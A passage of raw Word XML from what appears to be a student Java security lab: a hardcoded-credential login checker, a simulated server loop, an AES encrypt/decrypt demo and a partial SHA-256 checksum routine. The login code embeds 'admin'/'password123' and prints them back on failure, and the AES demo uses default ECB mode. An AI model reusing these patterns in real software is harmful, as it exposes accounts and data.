          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF236FD" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="391" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A25A679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>package package1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71705854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</w:p>
    <w:p w14:paraId="7DF98FB0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>import java.io.FileWriter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A58D5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>import java.io.IOException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FED3FF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>import java.util.Scanner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017B7B4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</w:p>
    <w:p w14:paraId="18EF349B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>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1EB56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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E1197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String correctUsername = "admin";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA5B569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String correctPassword = "password123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D31AB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED753A0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Scanner scanner = new Scanner(System.</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AFE72F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.print("Enter username: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844C98C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String username = scanner.nextLine().trim();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4C0AC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.print("Enter password: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359064E5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String password = scanner.nextLine().trim();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B79EF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F01B05F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.println("\n[Login Attempt]");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED811BE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.println("Username entered: " + username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D68B7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.println("Password entered: " + (password.isEmpty() ? "&lt;empty&gt;" : "&lt;hidden&gt;"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316DAEC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED94A2E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if (username.equals(correctUsername) &amp;&amp; password.equals(correctPassword)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFAB44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.println("Status: Login Successful!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A2066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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99DAF2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.println("Attempting to write to 'login.txt'...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48715359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    FileWriter writer = new FileWriter("login.txt", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E976A94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    String logEntry = "User " + username + " logged in at " + java.time.LocalDateTime.</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>() + "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E08329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    writer.write(logEntry);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D149C1B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    writer.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB573FB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        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.println("Log updated successfully with entry: " + logEntry.trim());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F1230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} catch (IOException ioe) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9A982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.println("I/O Exception: " + ioe.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48B3A0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FBAF8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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33549EA0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.println("Status: Invalid Credentials!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056347E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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Hint: Username must be 'admin', password must be 'password123'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628B3D9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328838CA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    scanner.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF776A0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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E9869" w14:textId="77777777" w:rsidR="000067D7" w:rsidRPr="000067D7" w:rsidRDefault="000067D7" w:rsidP="000067D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="391"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000067D7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78382432" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRPr="000067D7" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="391" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360DFD16" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00270D20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657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HTTPS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Java's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SSL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client-server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C6EC8" w14:textId="77777777" w:rsidR="00270D20" w:rsidRDefault="00270D20" w:rsidP="00270D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="657" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E3D7CE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>import java.util.Random;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DADDB7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</w:p>
    <w:p w14:paraId="75789430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>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9E60E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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B813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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Server simulation started...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20795541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Random rand = new Random();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C86784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int requestCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838290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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B48A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while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F680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requestCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F73001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String fakeClient = "Client" + rand.nextInt(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9978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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("[" + java.time.LocalDateTime.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>() + "] Request #" + requestCount + " from " + fakeClient);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3768AB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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Processing request...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7325F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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Response sent to " + fakeClient + ": Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051466F1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABDEBE9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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63104AF8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    Thread.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(2000); // 2-second delay between "requests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0318F9B8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} catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7030B15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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Simulation interrupted: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710BBAB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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC3DCC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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBC188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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C5326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/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC78103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 w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293A2CEA" w14:textId="77777777" w:rsidR="00270D20" w:rsidRPr="00270D20" w:rsidRDefault="00270D20" w:rsidP="00270D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="657" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B30756" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00270D20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line="237" w:lineRule="auto"/>
        <w:ind w:right="404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securely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sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06291171" w14:textId="77777777" w:rsid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 w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF7B45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>import javax.crypto.Cipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418E141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>import javax.crypto.KeyGenerator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598656A0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>import javax.crypto.SecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B61411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>import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C7EC9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</w:p>
    <w:p w14:paraId="730897BE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lastRenderedPageBreak/>
        <w:t>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2531A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public static void main(String[] args) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732AE8AE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// Generate AES key (128-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502D4C0D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KeyGenerator keyGen = KeyGenerator.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("AES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB7DD7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keyGen.init(128);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA78942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SecretKey secretKey = keyGen.generateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F496F08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</w:p>
    <w:p w14:paraId="1F357FBE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String originalData = "SensitiveData123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62725CD6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</w:p>
    <w:p w14:paraId="58605C27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// Encrypt the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC18EA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Cipher encryptCipher = Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("AES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62148D31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encryptCipher.init(Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ENCRYPT_MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497975E1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byte[] encryptedBytes = encryptCipher.doFinal(originalData.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC13DA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String encryptedData = Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().encodeToString(encryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B82673E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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Encrypted Data: " + encryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF6F38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</w:p>
    <w:p w14:paraId="5F1A8BF0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// </w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187752CD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Cipher decryptCipher = Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("AES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0496E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decryptCipher.init(Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DECRYPT_MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FDDB52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byte[] decryptedBytes = decryptCipher.doFinal(Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getDecoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().decode(encryptedData));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3DB3D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String decryptedData = new String(decryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E9611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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Decrypted Data: " + decryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FDB06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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72224EA4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/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270D20">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348ADF62" w14:textId="77777777" w:rsidR="00270D20" w:rsidRPr="00270D20" w:rsidRDefault="00270D20" w:rsidP="00270D20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="404" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2D5FFB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592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downloaded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SHA- 256 checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E31149" w14:textId="77777777" w:rsidR="00A17285" w:rsidRDefault="00A17285" w:rsidP="00A17285">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="592" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3355D671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</w:p>
    <w:p w14:paraId="7F1078F3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>import java.io.File;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD028E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>import java.io.FileInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657DA3A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>import java.security.MessageDigest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BB857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>import java.util.Formatter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBB034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</w:p>
    <w:p w14:paraId="1B63A97D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>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969D7C8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public static String calculateSHA256(File file) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C87F669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MessageDigest digest = MessageDigest.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("SHA-256");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705036C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FileInputStream fis = new FileInputStream(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36610194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byte[] buffer = new byte[1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42865F36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int bytesRead;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF694B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while ((bytesRead = fis.read(buffer)) != -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C773172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    digest.update(buffer, 0, bytesRead);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0BC07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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A3BAD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fis.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05401B3E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return </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>byteArray2Hex</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(digest.digest());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0761C044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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19A0A8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</w:p>
    <w:p w14:paraId="0E353077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private static String byteArray2Hex(byte[] bytes) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990FA22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Formatter formatter = new Formatter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8A6F8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        for (byte b : bytes) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A4FE9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    formatter.format("%02x", b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202872FD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0297A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String hex = formatter.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED417CB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formatter.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1A4DC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return hex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E44CA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1F46B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</w:p>
    <w:p w14:paraId="3B6A6A17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public static void main(String[] args) throws Exception {</w:t>
      </w:r>
    </w:p>
